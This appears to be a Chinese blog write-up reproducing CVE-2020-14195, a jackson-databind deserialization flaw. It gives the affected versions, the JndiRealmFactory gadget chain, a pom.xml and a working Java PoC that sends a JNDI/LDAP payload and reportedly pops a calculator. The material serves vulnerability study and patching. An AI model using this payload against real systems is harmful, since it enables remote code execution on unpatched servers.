(CVE-2020-14195)FasterXML_jackson-databind_反序列化漏洞

# (CVE-2020-14195)FasterXML jackson-databind 反序列化漏洞

=================

一、漏洞简介
————

**利用条件**开启`enableDefaultTyping()`使用了`org.jsecurity.realm.jndi.JndiRealmFactory`第三方依赖

二、漏洞影响
————

jackson-databind before 2.9.10.4jackson-databind before 2.8.11.6jackson-databind before 2.7.9.7

三、复现过程
————

### 漏洞分析

首先定位到`org.jsecurity.realm.jndi.JndiRealmFactory`类,之后发现一处可疑的JNDI注入:1.png参数`name`来自i\$,而`i$`源自`jndiNames`,此时要想进入`lookup`需要满足前面的if条件语句,即`jndiNames`不为空,且不为`null`,所以我们可以在构造poc时直接对`jndiName`进行传参赋值操作即可,同时将其设置为我们的ldap恶意服务:2.png整个利用链如下所示:

mapper.readValue
->setJndiNames
->getRealms
->lookup

### 漏洞复现

> pom.xml如下:



com.fasterxml.jackson.core
jackson-databind
2.9.10.4



org.jsecurity
jsecurity
0.9.0


org.slf4j
slf4j-nop
1.7.2



javax.transaction
jta
1.1

> 漏洞POC:

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = “[\”org.jsecurity.realm.jndi.JndiRealmFactory\”,{\”jndiNames\”:\”ldap://127.0.0.1:1099/Exploit\”}]”;
try {
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
} catch (IOException e) {
e.printStackTrace();
}
}
}

之后运行该程序,成功执行命令,弹出计算器:

3.png

参考链接
——–

> https://xz.aliyun.com/t/8012\#toc-18

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容